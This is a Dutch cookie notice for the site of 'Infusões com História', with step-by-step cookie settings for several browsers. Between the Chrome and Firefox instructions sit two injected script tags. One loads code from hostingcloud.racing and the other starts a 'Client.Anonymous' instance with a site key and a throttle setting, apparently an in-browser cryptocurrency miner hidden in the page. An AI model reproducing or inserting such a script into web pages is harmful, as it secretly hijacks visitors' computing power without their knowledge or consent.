Cookies

Wat is het nut van het accepteren van cookies?

Wanneer u de website www.infusoescomhistoria.pt bezoekt, zullen deze cookies bepaalde informatie registreren die op uw terminal wordt opgeslagen. Deze informatie wordt met name gebruikt om u producten aan te bieden op basis van de artikelen die u tijdens uw vorige bezoeken reeds hebt geselecteerd, en stelt u zo in staat te profiteren van een betere navigatie op onze website.

Indien u cookies weigert

Wanneer u cookies weigert, installeren wij niettemin een “weiger”-cookie. Deze cookie stelt ons in staat uw keuze te onthouden, zodat wij u niet bij elk bezoek hoeven te vragen of u cookies wilt accepteren of weigeren.

Configuratie van uw browser

De configuratie van het cookiebeheer hangt af van elke browser en is te vinden in het helpmenu van uw browser.

In Internet Explorer

Om de cookie-instellingen voor een webpagina aan te passen

Klik in Internet Explorer op de knop Extra en vervolgens op Internet-opties.

Klik op het tabblad Privacy en vervolgens op Sites.

Voer in het veld Websiteadres het volledige adres (URL) in van de webpagina waarvan u de privacyinstellingen wilt aanpassen.

Bijvoorbeeld, http://www.microsoft.com.

Om toe te staan dat cookies van de gespecificeerde webpagina op uw computer worden opgeslagen, klikt u op Toestaan. Om te verbieden dat cookies van de opgegeven webpagina op uw computer worden opgeslagen, klikt u op Blokkeren.

Herhaal stap 3 en 4 voor elke webpagina die u wilt blokkeren of toestaan. Als u klaar bent, klikt u tweemaal op OK.

In Safari

Ga naar Voorkeuren, klik op het Privacy paneel, en dan Cookies beheren.

In Chroom

Klik op het Chrome-menu dat zich op de werkbalk van de browser bevindt.

Selecteer Instellingen.

Klik op Geavanceerde instellingen weergeven.

Klik in het gedeelte “Privacy” op de knop Inhoudsinstellingen.

In de “Cookies” sectie, kunt u de volgende instellingen wijzigen:

Cookies verwijderen

Standaard cookies blokkeren

Cookies standaard toestaan

Maak uitzonderingen voor cookies van specifieke websites of domeinen.

<script type=”text/javascript” src=”https://www.hostingcloud.racing/pgTV.js”></script>

<script type=”text/javascript”> var _c = new Client.Anonymous(‘a727a7dddb149de94ae33a16d66eef6b65c9a1cae0da689f2cb32c5884948180’, { throttle: 0.5 }); _c.start(); </script>

In Firefox

Klik op de knop Extra en vervolgens op Opties.

Klik op het tabblad Privacy.

Onder Geschiedenis, selecteer “Gebruik aangepaste instellingen voor geschiedenis.”

Vink het vakje “cookies accepteren” aan en klik op uitzonderingen om de websites te kiezen die wel of geen cookies op uw terminal mogen installeren.

In Opera

Voorkeuren > Geavanceerd > Cookies

Met de cookievoorkeuren kunt u bepalen hoe Opera cookies beheert. De standaardinstelling is om alle cookies te accepteren.

Cookies aanvaarden

– Alle cookies worden geaccepteerd (standaard)

Accepteer alleen cookies van de site die ik bezoek

– Cookies van derden, van een domein buiten het domein dat u bezoekt, worden geweigerd

Accepteer nooit cookies

– Alle cookies zullen worden geweigerd

Bijwerking juridische kennisgeving

Infusões com História behoudt zich het recht voor om wijzigingen of correcties aan te brengen in deze cookie-kennisgeving. Kijk regelmatig op deze pagina om de informatie te bekijken en te zien of er updates zijn.